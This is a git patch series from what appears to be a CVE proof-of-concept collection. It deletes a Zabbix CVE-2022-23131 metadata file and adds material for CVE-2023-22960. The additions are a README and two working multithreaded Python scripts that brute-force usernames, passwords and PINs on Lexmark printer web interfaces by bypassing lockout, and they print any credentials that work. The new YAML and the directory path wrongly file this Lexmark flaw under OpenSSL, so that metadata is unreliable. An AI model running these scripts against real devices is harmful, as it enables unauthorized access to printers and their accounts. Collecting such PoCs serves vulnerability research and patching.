From 716cf77750fb8ff7e960374fa5cb2cf754112830 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=B4=94=E8=8E=B9?= Date: Thu, 6 Apr 2023 12:56:05 +0000 Subject: [PATCH 1/2] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?zabbix/2022/yaml/CVE-2022-23131.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/zabbix/2022/yaml/CVE-2022-23131.yaml | 20 -------------------- 1 file changed, 20 deletions(-) delete mode 100644 cve/zabbix/2022/yaml/CVE-2022-23131.yaml diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml deleted file mode 100644 index 0eab256c..00000000 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 -info: - name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 - severity: critical - description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 - scope-of-influence: - Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://www.secpulse.com/archives/179601.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - cnvd-id: None - kve-id: None - tags: 前端认证绕过漏洞 \ No newline at end of file -- Gitee From 7e72fb1f1daf73110dbda267963846b871c37e85 Mon Sep 17 00:00:00 2001 From: cuiying0719 Date: Thu, 6 Apr 2023 21:20:41 +0800 Subject: [PATCH 2/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-22960?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/openssl/2023/CVE-2023-22960/README.md | 26 ++++ .../lexmark-brute-force-login.py | 112 ++++++++++++++++++ .../lexmark-brute-force-pins.py | 106 +++++++++++++++++ cve/openssl/2023/yaml/CVE-2023-22960.yaml | 18 +++ openkylin_list.yaml | 1 + 5 files changed, 263 insertions(+) create mode 100644 cve/openssl/2023/CVE-2023-22960/README.md create mode 100644 cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py create mode 100644 cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py create mode 100644 cve/openssl/2023/yaml/CVE-2023-22960.yaml diff --git a/cve/openssl/2023/CVE-2023-22960/README.md b/cve/openssl/2023/CVE-2023-22960/README.md new file mode 100644 index 00000000..32231c82 --- /dev/null +++ b/cve/openssl/2023/CVE-2023-22960/README.md @@ -0,0 +1,26 @@ +# PoC for CVE-2023-22960 +[![Python](https://img.shields.io/badge/Python-%E2%89%A5%203.6-yellow.svg)](https://www.python.org/) + +[![License](https://img.shields.io/badge/license-MIT-red.svg)](https://github.com/t3l3machus/CVE-2023-22960/blob/main/LICENSE) +## Details +This vulnerability allows an attacker to bypass the credentials brute-force prevention mechanism of the Embedded Web Server (interface) of more than 60 Lexmark printer models. This issue affects both username-password and PIN authentication. + +**Official security advisory** -> https://publications.lexmark.com/publications/security-alerts/CVE-2023-22960.pdf + +**PoC tested against**: + - Lexmark MX622adhe + - Lexmark CX735adse + - Lexmark MX521ade + +#### Video Presentation +In this video I demonstrate the issue as well as how to write an http(s) login bruteforce script with Python. +https://www.youtube.com/watch?v=HuAqTScr_3s + +## Preview + +Without the brute-force prevention bypass: +![image](https://user-images.githubusercontent.com/75489922/214288009-d0cda79b-e604-478a-9bbc-39175c20a6ab.png) + + +Applying the the brute-force prevention bypass: +![image](https://user-images.githubusercontent.com/75489922/214286428-fb2cc7b3-9c58-4aed-a343-2d66610ca407.png) diff --git a/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py new file mode 100644 index 00000000..20fd7460 --- /dev/null +++ b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-login.py @@ -0,0 +1,112 @@ +#!/usr/bin/env python3 +# +# Author: Panagiotis Chartas (t3l3machus) +# Usage: lexmark-brute-force-login.py -t TARGET -P PROTOCOL -u USERNAMES_FILE -p PASSWORDS_FILE [-h] +# +# https://github.com/t3l3machus + +import requests, threading, re, argparse +from random import randint +requests.packages.urllib3.disable_warnings() + +# -------------- Arguments -------------- # +parser = argparse.ArgumentParser() + +parser.add_argument("-t", "--target", action="store", help = "IP or domain name of the target. Use it to specify port as well (e.g. 192.168.0.56:8080)", required = True) +parser.add_argument("-P", "--protocol", action="store", help = "HTTP or HTTPS.", required = True) +parser.add_argument("-u", "--usernames-file", action="store", help = "File containing a usernames list", required = True) +parser.add_argument("-p", "--passwords-file", action="store", help = "File containing a passwords list.", required = True) + +args = parser.parse_args() + +# Colors +MAIN = '\033[38;5;50m' +FAIL = '\033[1;91m' +END = '\033[0m' +BOLD = '\033[1m' +ORANGE = '\033[0;38;5;214m' +GREEN = '\033[38;5;82m' + +MAIN_BULLET = f'[{MAIN}*{END}]' + +# Threading +max_threads = 80 +thread_limiter = threading.BoundedSemaphore(max_threads) + +# Request +# The login URL below might not be exactly the same for all printer models. You may need to edit the resource /webglue/session/create +login_url = f'{args.protocol}://{args.target}/webglue/session/create' + +headers = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', + 'Accept': 'application/json, text/javascript, */*; q=0.01', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate, br', + 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', + 'X-Requested-With': 'XMLHttpRequest', + 'Connection': 'keep-alive', + 'Cookie': 'lang=en; autoLogin=false', + 'Sec-Fetch-Dest': 'empty', + 'Sec-Fetch-Mode': 'cors', + 'Sec-Fetch-Site': 'same-origin' +} + +# Usernames & Passwords +def get_file_contents(path): + + f = open(path, 'r') + contents = f.readlines() + f.close() + return contents + + +usernames = get_file_contents(args.usernames_file) +passwords = get_file_contents(args.passwords_file) +users_count = len(usernames) +passwds_count = len(passwords) + + +def bruteforce(user): + + thread_limiter.acquire() + + for passwd in passwords: + + passwd = passwd.strip() + authId = randint(-1000000, 1000000) + data = '{"authtype" : 0, "authId" : ' + str(authId) + ', "creds": {"username" : "' + user + '", "password" : "' + passwd + '"}}' + post_req_data = {'data': data, 'lang':'en'} + + try: + response = requests.post(url = login_url, data = post_req_data, verify = False, allow_redirects = False, headers = headers) + content = response.content.decode() + + if re.search('sessionId', content): + print(f'{GREEN}{user}{END} : {GREEN}{passwd}{END}\n' + content + '\n') + + # Comment out the else statement for non verbose output + else: + print(f'{ORANGE}{user}{END} : {ORANGE}{passwd}{END} ' + content) + + except: + print(f'{FAIL}FAIL{END} Something went wrong. [status: {response.status_code}]') + + thread_limiter.release() + + + +def main(): + + print(f'\r{MAIN_BULLET} PoC for CVE-2023-22960 by t3l3machus (https://github.com/t3l3machus){END}') + print(f'{MAIN_BULLET} Initiating credentials brute force attack against: {login_url}{END}') + print(f'{MAIN_BULLET} Number of usernames loaded:{END} {users_count}') + print(f'{MAIN_BULLET} Number of passwords loaded:{END} {passwds_count}') + print(f'{MAIN_BULLET} Estimated number of queued login attempts:{END} {users_count*passwds_count}') + + for user in usernames: + threading.Thread(target = bruteforce, args = (user.strip(),)).start() + + +if __name__ == '__main__': + main() + \ No newline at end of file diff --git a/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py new file mode 100644 index 00000000..59a122a5 --- /dev/null +++ b/cve/openssl/2023/CVE-2023-22960/lexmark-brute-force-pins.py @@ -0,0 +1,106 @@ +#!/usr/bin/env python3 +# +# Author: Panagiotis Chartas (t3l3machus) +# usage: lexmark-brute-force-pins.py -t TARGET -P PROTOCOL -p PINS_FILE [-h] +# +# https://github.com/t3l3machus + +import requests, threading, re, argparse +from random import randint +requests.packages.urllib3.disable_warnings() + +parser = argparse.ArgumentParser() + +parser.add_argument("-t", "--target", action="store", help = "IP or domain name of the target. Use it to specify port as well (e.g. 192.168.0.56:8080)", required = True) +parser.add_argument("-P", "--protocol", action="store", help = "HTTP or HTTPS.", required = True) +parser.add_argument("-p", "--pins-file", action="store", help = "File containing a PINS list.", required = True) + +args = parser.parse_args() + +# Colors +MAIN = '\033[38;5;50m' +SUCCESS = '\033[38;5;82m' +FAIL = '\033[1;91m' +END = '\033[0m' +BOLD = '\033[1m' +ORANGE = '\033[0;38;5;214m' +GREEN = '\033[38;5;82m' + +MAIN_BULLET = f'[{MAIN}*{END}]' + +# Threading +max_threads = 80 +thread_limiter = threading.BoundedSemaphore(max_threads) + +# Request +# The login URL below might not be exactly the same for all printer models. You may need to edit the resource /webglue/session/create +login_url = f'{args.protocol}://{args.target}/webglue/session/create' + +headers = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', + 'Accept': 'application/json, text/javascript, */*; q=0.01', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate, br', + 'Content-Type': 'application/x-www-form-urlencoded; charset=utf-8', + 'X-Requested-With': 'XMLHttpRequest', + 'Connection': 'keep-alive', + 'Cookie': 'lang=en; autoLogin=false', + 'Sec-Fetch-Dest': 'empty', + 'Sec-Fetch-Mode': 'cors', + 'Sec-Fetch-Site': 'same-origin' +} + +# PINS +def get_file_contents(path): + + f = open(path, 'r') + contents = f.readlines() + f.close() + return contents + + +pins = get_file_contents(args.pins_file) +pins_count = len(pins) + + +def bruteforce(pin): + + thread_limiter.acquire() + pin = pin.strip() + authId = randint(-1000000, 1000000) + data = '{"authtype" : 3, "authId" : ' + str(authId) + ', "creds": {"pin" : "' + pin + '"}}' + post_req_data = {'data':data, 'lang':'en'} + + try: + response = requests.post(url = login_url, data = post_req_data, verify = False, allow_redirects = False, headers = headers) + content = response.content.decode() + + if re.search('sessionId', content): + print(f'Match: {GREEN}{pin}{END} ' + content) + + # Comment out the else statement for non verbose output + else: + print(f'{ORANGE}{pin}{END} ' + content) + + except: + print(f'{FAIL}FAIL{END} Something went wrong. [status: {response.status_code}]') + + finally: + thread_limiter.release() + + + +def main(): + + print(f'\n{MAIN_BULLET} PoC for CVE-2023-22960 by t3l3machus (https://github.com/t3l3machus)') + print(f'{MAIN_BULLET} Initiating PIN authentication brute force attack against: {login_url}') + print(f'{MAIN_BULLET} Number of PINs loaded: {pins_count}') + print(f'{MAIN_BULLET} Successful attempts will be logged below (if any):') + + for pin in pins: + threading.Thread(target = bruteforce, args = (pin.strip(),)).start() + + +if __name__ == '__main__': + main() + \ No newline at end of file diff --git a/cve/openssl/2023/yaml/CVE-2023-22960.yaml b/cve/openssl/2023/yaml/CVE-2023-22960.yaml new file mode 100644 index 00000000..a9ed462c --- /dev/null +++ b/cve/openssl/2023/yaml/CVE-2023-22960.yaml @@ -0,0 +1,18 @@ +id: CVE-2023-22960 +source: https://github.com//t3l3machus//CVE-2023-22960 +info: + name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。 + severity: HIGH + description: Lexmark产品到2023-01-10对交互频率控制不当 + scope-of-influence: + cpe:2.3:o:lexmark:b2236_firmware:*:*:*:*:*:*:*:* + reference: + - https://nvd.nist.gov/vuln/detail/cve-2023-22960 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-22960 + cwe-id: CWE-307 + cnvd-id: None + kve-id: None + tags: Lexmark产品到2023-01-10对交互频率控制不当 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a9f9109b..e778cb63 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -136,6 +136,7 @@ cve: - CVE-2022-0778 - CVE-2022-3786 - CVE-2016-2107 + - CVE-2023-22960 joomla: - CVE-2023-23752 libxml2: -- Gitee